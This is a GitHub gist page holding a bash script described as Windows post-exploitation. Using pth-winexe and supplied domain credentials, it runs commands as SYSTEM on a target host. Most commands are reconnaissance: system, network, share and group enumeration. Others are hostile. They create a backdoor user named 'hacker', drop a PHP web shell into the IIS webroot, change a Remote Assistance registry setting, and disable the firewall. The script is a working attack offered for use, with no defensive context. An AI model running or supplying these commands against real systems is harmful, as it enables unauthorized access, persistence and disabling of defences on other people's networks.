Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
A Windows post exploitation shell script
#!/bin/bash
TARGET=$1
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "powershell.exe -command Get-Hotfix"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net user hacker PASSWORD /add"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs /add hacker"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net group 'Domain Admins' /domain"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "echo ^< ?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\backdoor.php"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fAllowToGetHelp /t REG_DWORD /d 1 /f"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netsh firewall set opmode disable"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.